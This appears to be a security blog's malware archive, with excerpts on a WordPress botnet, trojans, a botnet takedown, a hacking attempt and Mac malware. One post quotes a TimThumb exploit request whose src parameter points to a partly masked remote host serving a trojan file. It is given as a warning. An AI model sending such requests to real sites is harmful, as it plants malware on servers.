Category Archives: Malware

Malware, Trojans, Virus, Internet Security

Massive Number Websites in Botnet

Massive Number of Hacked USA Websites Participate in WordPress Botnet Attack

website botnet thumbnail imageFor the past couple of days we’ve been watching a customers WordPress site being attacked by a botnet of websites trying to access site admin with user name “admin” and a variety of simple passwords.

Most of these attacks are coming from USA based web hosting services. One particular top level service provider, Provo Unified Layer, stands out above the rest as the most hacked network. Many 2nd tier providers use Provo Unified Layer infrastructure including Bluehost and Hostmonster. Of the hosts using Provo Unified Layer infrastructure, Bluehost is ahead of the pack in having hosted sites participating in the botnet. (Read more about Bluehost and the Botnet).

Read the rest of this entry

Advertisements

WPOnlineStore PHP Fatal Error ‘function.require’

Googlebot Error with WPOnlineStore Plugin

Googlebot triggers a PHP Fatal Error ‘function.require‘ error causing the bot to receive a “500” internal server error when trying to crawl the pages created by the WordPress WPOnlineStore plugin. In my previous post I mentioned this ongoing problem. Today I can provide some additional information.

The problem is not unique to my shop site; initial searches of the internet found only a few references to this problem. for the past two days the hosting company server engineers have been looking into the problem, unfortunately without any success. After disabling Apache mod_secure settings, which appeared to be causing the error, Googlebot still triggered this error.  As previously mentioned in Googlebot has Problems with WPOnlineStore, it is only Googlebot – and there lies the first clue.

Read the rest of this entry

Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

Microsoft Security Essentials LogoA look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?

Over the next few months we will see.

Annoyed with Commercial AV Software.

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.

Read the rest of this entry

Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to picasa spoof malwareinject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!

Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.

Read the rest of this entry

Soccer Trojan from South Africa

Home Grown Malware?

Satelite Image of South Africa

Image from Wikipedia

It looks like Trojan tvwjfm.exe (with several other names too – list of known names and further information) could have originated from South Africa. At least the first reported  infections came from this locale.

This makes a change to the norm where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.

This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.

The file is unusually large for a Trojan, containing a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware unknown to the PC user.

Soccer Trojan

Soccer TrojanI have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.

Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.

Rove Digital Botnet Take-Down

Cyber-Criminals Arrested, US Offices Closed

A cyber criminal network operated by Estonian company Rove Digital was taken down on November 8 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police in co-operation with Trend Micro.

Rove Digital operated a botnet consisting over four million (4 000 000) bots on computers infected with a class of malware known as ‘DNSChangers’. The infected systems will typically have their Domain Name Server (DNS) changed to point to foreign IP addresses.

Rove digital appears on the surface as a legitimate business, with established offices in Tartu, Estonia. They are the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.

Rove Digital used a variety of  criminal methods to earn money from the DNS changers. The cyber crime network has operated from 2006.

Operation Ghost Click

Read the rest of this entry

Website Hacking Attack

Hacking Attempt from IP 86.96.226.87/8

An unsuccessful attempt to hack my website graphicline.co.za was made Friday 21 October 2011 shortly before 15h00 SAST  (13h00 GMT).

Satellite image of hacker in dubai location

Click image for larger view (image from Google Earth)

The attempt was first identified by repeated 404 ‘page not found’ and 403 ‘access forbidden’ messages resulting from the hacker using URLS while trying to get access to the server and website setup files, and to log-in to unauthorised and prohibited areas of the website and server. The server is set to send notifications to me of 404, 403 and similar errors.

The attack originated from a business on the corner of Jumeirah Road and Sheikh Rashid Road, Juneirah, Dubai, United Arab Emirates. The business is located in a warehouse or freight depot. Identified from the IP addresses used during the attack – IP 86.96.226.87 and 86.96.226.88. It appears two hackers were working simultaneously.

I should thank these ill intended persons for testing the security of the website and server. Each incident is an opportunity to examine security, to improve the strength of the server environment.

Read the rest of this entry

Trojan Generic24 Family

Article about Trojan Horse Generic24.cgol

The previous article posted on this blog about Generic 24 Trojans elicited a lot of interest. Even more interest was shown in my removal tips for the generic24.cgol variant, posted on my website.

I thought now would be a good time to post an update. The .cgol variety seems to have died down somewhat, however it seems everyday that a new version is detected. Recent references I found include;

  • trojan generic 24 cjgk (also generic24.cjgk (20 Sept 2011)
  • trojan Generic24.BRQA 
  • trojan Generic24.BRQD
  • trojan Generic24.BRQF etc (Full list at AVG)
  • Trojan Horse generic24.TSU (21 Sept 2011)
  • trojan Generic24.BUOM
  • Generic24.BVUA (22 Sept 2011)
  • trojan generic24 pnt (12 Sept 2011)
  • GENERIC 24.CPQJ (23 Sept 2011)
  • trojan-generic24-aawj (12 Sept 2011)
  • Trojan horse Generic24.CAVY (21 Sept 2011)
  • GENERIC 24.CPQJ (23 Sept 2011)
  • Generic24.BIVS (2 Sep 2011)
  • Generic24.FLZ (05 Oct 2011)
  • Trojan horse Generic24.PYB (01 Oct 2011)
  • Generic24.ATJW (03 Sept 2011)
  • Trojan horse Generic 24.WMQ (24 Sept 2011)

The list goes on; these are from recent forums and other articles found via a search engine, from Sept this year.

There are literally thousands of similar malware trojans with the name ‘generic’

One common factor is they are generally considered hacking malware, opening a backdoor to other viruses which capture personal information from the user of an infected PC.

Again I stress the importance of early intervention should one of these trojans infect your PC.

The removal tips at the above web address can be used to fix most early infections by looking for similar HKEY references to those mentioned for FireFox

More on Spam Comments

Support for Spam Commenting

Spam is not to smile aboutSome people actually defend spam commenting!

 Why would anyone support spam commenting. There are only two reasons I can think of.

  1. The supporter is so desperate for attention they get a sense of satisfaction from receiving any comment, even if it is just pure spam. Possible I suppose.
  2. More likely the supporter of spam comments is a spammer. Obviously someone who spends their time generating spam, possibly even creating spambots and botnets, is not going to oppose spam comments. They want bloggers and web site owners to allow spam comments. That’s where they derive their income from.

Stop Spam Commenting

This is my opinion. Stop spam by any technical means possible. If that means preventing public (unregistered) commenting, critical moderation of comments, using CAPTCHA tools, feel free to do it (unless of course one wants to publish irrelevant spam comments on their articles).

Personally, I have no objection to signing in to one of my accounts, either WordPress.com, Facebook, Twitter, OpenID, creating a new account with the site, or filling in a CAPTCHA challenge – if I have something I think may be worth saying in a comment.

Connect with Facebook Twitter and WordPressIn a similar vein, I have no objection allowing Twitter or Facebook to connect my accounts with WordPress.com – if I did not trust WordPress.com I would not blog on this platform. I have come across the objection from someone who doesn’t see why they should use their Twitter or Facebook account to login in order to comment and thereby ‘letting me post articles to their account’ This is pure nonsense. Connecting with WordPress.com does not connect my blog with their profile. A statement saying ‘I do not want Joe Soap to post in my name’ simply indicates the remark comes from someone with little real world understanding of web things, suffers paranoid delusions, or who has possible ulterior motives – Freedom to Spam perhaps?

I have allowed the connection with WordPress.com to my Twitter accounts and Facebook – and I am yet to see any post to my wall, or a tweet from someone other than myself appearing as ‘coming from me’ or indeed in the timeline from anyone I do not follow on Twitter or a friend on Facebook. Maybe I will one day…

The idea that commenting using WordPress.com, Facebook or Twitter automatically allows someone to post or tweet using their identity is utter nonsense – unless it’s a malware app, in which case there are ways to deal with it. Internet security is always a concern. Exactly why spam should be blocked.

Use of CAPTCHA challenges Read the rest of this entry

Apple Mac Not Immune to Malware

Apple Macs do get Malware

Macs get worms tooHow often do we still hear Mac users blithely proclaiming they have no need for Anti Virus software because Macs don’t get viruses. Well Mac users, those days are gone for good, if they ever existed at all.

The fact that what some regard as the world’s first virus, “Elk Cloner”, was a Mac virus seems to have exited people’s minds.

The hardness of Mac’s Unix core operating system perhaps makes it more difficult for malicious persons to write viruses and trojans for Macs. Also in the old days Mac users were a very small group of computers users, mainly professionals involved in the print and graphics industries, not a big enough target for virus creators to spend their time on.

Mac users have been complacent, secure in the expectation their systems are safe;  At one time I was one of them. I used Macs for years with no AV software installed.

Recent Mac Viruses

Only a few months ago, MacDefender Tojan Horse was happily infecting Macs around the world, and just today, an article from Sophos Naked Security highlights another Mac trojan, OSX/Revir-B.

These Mac Trojans are not however the end of the story. Consider all the file sharing between Mac and Windows users in the commercial world.

Macs can give Window Malware

Is it safe to use Macs with no AV softwareHow often do files get transferred from Mac to Windows platforms. How often do vulnerable removable drives get used to transfer these files.

Here is an example:
User A prepares work on a Mac. User A has no Anti Virus software because Macs are immune! Unknown to user A, a visit to a website has installed a Windows virus or trojan in a Word or Excel file. User A sends the file to user B, a Windows user. User B’s PC gets infected!

Or another example;
User A gets an e-mail containing malware and forwards it to User B. Once again User B’s PC gets infected.

Mac Users, break the malware chain, get your Macs protected. The days of Mac immunity to malware are gone for ever.